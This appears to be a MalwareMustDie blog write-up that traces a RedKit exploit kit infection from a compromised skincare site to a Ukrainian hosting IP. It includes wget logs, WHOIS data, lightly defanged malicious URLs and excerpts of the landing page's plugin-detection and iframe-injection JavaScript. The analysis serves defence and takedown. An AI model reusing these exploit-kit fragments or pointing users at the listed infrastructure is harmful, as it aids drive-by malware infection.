The difference between my previous analysis and this one is, this was purely analyzed & wrote from a "weaponized" OS X with my bunch of FreeBSD tools recompiled on it.
I hope this writing can be used as a how-to to my friends who used OSX same environment too. So for Mac users, specially for you who are familiar with UNIX/Linux command lines, don't be hurry to switch into other "X" OS for analysis, in my test-drive in writing this post, it proofed that OS X is more than enough to do a deep analysis of any threat.
OK, here we go!
It all begins with the infected site as per below url:
During the access to the site I recorded the below connection with the X11's based Wireshark:
If we follow the package within one http response well, it will show the request for infection below:
We saw 4 or 5 redirection in a row in accessing the infector site above. So I grabbed the "anti-aging-c-35.html?p___= to see the redirected IFRAME code was there, as per below snipped of TextMate:
Why a single html can caused the 4 or 5 redirection? Must be more.. I searched the components included to view this site as per below search tools:
Then I opened my firefox, faking the request to fool the RedKit script and to get the other files used as components to this html, then found the same IFRAME method was injected as per searched in my F*bug:
In details, I went to those script contains the iframe to confirm as per below row of snapshots:
Seeing these I realized that this site is (STILL) completely being used to infect.
I further checked whether the infector site's domain is legit or not:
1 2 3 4 5 6 7 8 9 10 11 | Registered through: GoDaddy.com, LLC (http: //www.godaddy.com) Domain Name: TEVASKINCARE.COM Created on: 01-Mar-10 Expires on: 25-Jul-13 Last Updated on: 26-Jul-12 Registrant: Teva Skin Science LLC 117 Lost Forest Drive Westminster, SC 29693 United States |
1 2 3 4 | NetRange: 173.201.0.0 - 173.201.255.255 CIDR: 173.201.0.0/16 OriginAS: AS26496 NetName: GO-DADDY-COM-LLC |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | -2013-04-14 18:06:15-- h00p: //www.tevaskincare.com/anti-aging-c-35.html?p___= Resolving www.tevaskincare.com... 173.201.140.74 Caching www.tevaskincare.com => 173.201.140.74 Connecting to www.tevaskincare.com|173.201.140.74|:80... connected. : GET /anti-aging-c-35.html?p___= HTTP/1.1 Referer: Whatever that has google in it.. User-Agent: MalwareMustDie was banging your site to check RedKit infector.. Host: www.tevaskincare.com HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 14 Apr 2013 09:06:17 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip Vary: Accept-Encoding Set-Cookie: osCsid=svle39em7ni3oj6982rjaossm2; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html : 200 OK Length: unspecified [text/html] Saving to: ‘anti-aging-c-35.html?p___=’ 2013-04-14 18:06:20 (495 KB/s) - ‘anti-aging-c-35.html?p___=’ saved [6403] |

Not trusting so much on GUI result? Me too. So I reproduced the access:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | --2013-04-14 18:11:03-- h00p: //r-yonemura.jp/eagn.html?i=830988 Resolving r-yonemura.jp... 211.13.204.46 Caching r-yonemura.jp => 211.13.204.46 Connecting to r-yonemura.jp|211.13.204.46|:80... connected. : GET /eagn.html?i=830988 HTTP/1.1 Referer: h00p: //www.tevaskincare.com/anti-aging-c-35.html?p___= User-Agent: Beware malware.. MalwareMustDie is getting closer.. with new toyz.. Host: r-yonemura.jp HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 14 Apr 2013 09:11:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Content-Length: 0 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html 200 OK Length: 0 [text/html] Saving to: ‘eagn.html?i=830988’ 2013-04-14 18:11:07 (0.00 B/s) - ‘eagn.html?i=830988’ saved [0/0] |
So always remember rule number one which is never doing too much "HTTP-banging" in dealing with RedKit infectors :-)
Anyhow, let's study the site used for second infector:
1 2 3 4 5 6 7 8 9 | [Domain Name] R-YONEMURA.JP [Name Server] ns.namedserver.net [Name Server] ns2.namedserver.net [登録年月日] 2009/12/03 [有効期限] 2013/12/31 [状態] Active [最終更新] 2013/01/01 01:05:09 (JST) [名前] 株式会社リンクアップ [Name] link up inc |
1 2 3 4 5 | inetnum: 211.13.200.0 - 211.13.204.255 netname: ISLE-NET descr: Isle,inc. country: JP admin-c: MA117JP |
Fortunately, is the infector that I always keep an eye with, I always logged the "good response" as documentation which contained the Landing page that can be used as PoC as per pasted here -->>[HERE]
Now let's see the suspicious data in that landing page.. hope to see the interesting url for exploit infector or maybe a payload?
A Snip of Exploit Kit Landing Page
The plugin detect used...
1 2 3 4 5 6 7 8 | var Ganni = { version: "0.7.7" , rDate: "04/11/2012" , name: "Ganni" , handler: function (c, b, a) { return function () { c(b, a) } |
As per it is, the OS detection..
1 2 3 4 5 6 7 8 9 10 | c.OS = 100; if (b) { var d = [ "Win" , 1, "Mac" , 2, "Linux" , 3, "FreeBSD" , 4, "iPhone" , 21.1, "iPod" , 21.2, "iPad" , 21.3, "Win.*CE" , 22.1, "Win.*Mobile" , 22.2, "Pocket\s*PC" , 22.3, "" , 100 ]; for (f = d.length - 2; f >= 0; f = f - 2) { if (d[f] && new RegExp(d[f], "i" ).test(b)) { c.OS = d[f + 1]; break [...] |
Interesting flag of "status" to be pointed after after detecting java
1 2 3 4 5 | if (c.isIE && !c.ActiveXEnabled && d !== "java" ) { a.status = -2; return a } a.status = 1; [...] |
1 2 3 4 5 6 7 | Plugins: { adobereader: { mimeType: "application/pdf" , navPluginObj: null , progID: [ "AcroPDF.PDF" , "PDF.PdfCtrl" ], classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000" , INSTALLED: {}, [...] |
1 2 3 4 5 6 7 8 9 10 | flopp = Ganni.getVersion( "AdobeReader" ); if (flopp) { flopp = flopp.split( ',' ); sp1 = false ; if (flopp[1] < 4 && 9 == flopp[0]) sp1 = true ; if (flopp[1] < 3 && flopp[0] == 8) sp1 = true ; if (sp1) { bosfef.setAttribute( "width" , 31); bosfef.setAttribute( "height" , 13); |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | insertHTML: function (g, b, h, a, l) { var m, n = document, k = this , q, p = n.createElement( "span" ), o, j, f = "<" ; var c = [ "outlineStyle" , "none" , "borderStyle" , "none" , "padding" , "0px" , "margin" , "0px" , "visibility" , "visible" ]; var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;" ; if (!k.isDefined(a)) { a = "" } if (k.isString(g) && (/[^\s]/).test(g)) { g = g.toLowerCase().replace(/\s/g, "" ); q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ' ; q += 'style="' + i + 'display:inline;" ' ; for (o = 0; o < b.length; o = o + 2) { if (/[^\s]/.test(b[o + 1])) { q += b[o] + '="' + b[o + 1] + '" ' } } q += ">" ; for (o = 0; o < h.length; o = o + 2) { if (/[^\s]/.test(h[o + 1])) { q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />' } } q += a + f + "/" + g + ">" } else { q = a } [...] |
1 2 3 4 | var bosfef = document.createElement( "iframe" ); function dettq() { document.body.appendChild(bosfef); |
File's currently unavailable (smile), or tango moved faster?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | GET /987.pdf HTTP/1.1 Host: marykay-duka.kharkov.ua ( 91.206.200.199) HTTP request sent, awaiting response... : HTTP/1.1 404 Not Found Server: nginx/1.1.10 Date: Sun, 14 Apr 2013 13:12:13 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 205 Connection: keep-alive : 404 Not Found The requested URL /987.pdf was not found on this server ] done. 2013-04-14 22:12:15 ERROR 404: Not Found. |
What's with 91.206.200.199 ?
This is the main course of this story actually. As we can see the marykay-duka.kharkov.ua is a domain served in the Ukrainian Hosting service. The IP officially own by this host w/reversed IP registered by:
1 | "web17.ukraine.com.ua A 91.206.200.199" |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | "inetnum: 91.206.200.0 - 91.206.201.255 netname: Hosting descr: Delta-X LTD" org: ORG-LA230-RIPE country: UA admin-c: RIV3-RIPE tech-c: RIV3-RIPE status: ASSIGNED PI mnt-by: RIPE-NCC-END-MNT mnt-by: DELTAXUA-MNT organisation: ORG-LA230-RIPE org-name: "DELTA-X" LTD org-type: OTHER "address: Ukriane, Kyiv address: Bogdana Khmelnitskogo 16/22, r. 504/1 abuse-mailbox: abuse@delta-x.ua" admin-c: RIV3-RIPE person: Rudenko Ilya Vladimirovich address: UA, Kyiv, 03065 address: PO Box 65 phone: +38(044)392-74-33 abuse-mailbox: abuse@delta-x.ua |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | "Some PoC of infections in this Hosting server's IP.. urlquery ALSO detected other action in some of the domains under this IP..." url: http: //urlquery.net/search.php?q=91.206.200.199&type=string&start=2013-01-14&end=2013-04-14&max=50 Date (CET) Alerts / IDS URL IP "And so does Virus Total.." url: https: //www.virustotal.com/en/ip-address/91.206.200.199/information/ 2/36 2013-04-11 11:23:26 "h00p://chevrole.org.ua/" |

Thus, pDNS command line combined with domains checker script we posted in our Google Project can extract more domains used by malware infector & current ALIVE status:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | "..while these are domains with via UKRAINE.COM.UA registrar - with NS, a PoC of hosting (provided set of domains + DNS)" 490968298.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA overfuns.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA pro100soft.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA ukrjudo.com,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA zverdvd.org,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA pamparam.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA pr-plus.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA metal-forming.org,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA [...] etc [...] "AND these domains are pointed to an IP address w/o proper NS sets.." chevrole.org.ua,91.206.200.199, forum.zverdvd.org,91.206.200.43,91.206.200.199, funmobile.com.ua,91.206.200.199, marykay-duka.kharkov.ua,91.206.200.199, 2sen.ru,91.206.200.199,91.206.200.199, papercraft.su,91.206.200.210, reshebniki.org.ua,91.206.200.43,91.206.200.199, |
I didn't say that the 44 domains which are registered in this IP are verdicted bad, but some dangerous infector with the RedKit and etc Exploit Kit infector are found ending up to this IP.
( This is the list of active domains in 91.206.200.199 -->>[PASTEBIN] )
Furthermore the domain used for infection in our case is belong to below info:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | domain: marykay-duka.kharkov.ua descr: Domain registered for customer of Ukraine.com.ua admin-c: DELTA-EUNIC tech-c: DELTA-EUNIC nserver: ns1.ukraine.com.ua nserver: ns2.ukraine.com.ua nserver: ns3.ukraine.com.ua mnt-by: DELTA-MNT-EUNIC reg-by: DELTA-REG-EUNIC changed: hostmaster@deltahosting.com.ua 20130308 source: EUNIC Transfer: locked Record created: 2011-03-11 Record last updated: 2013-03-08 Record registered: 2011-03-11 Record expires: 2014-03-11 Status: OK |
The bottom line is, in the mean time please keep an eye on a suspicious access which lead to 91.206.200.199. And all of the network analysis was conducted via OSX Terminal :-)

References
The below numbers are link to the infection references that can be used for our infector dismantling (TangoDown) purpose:
#MalwareMustDie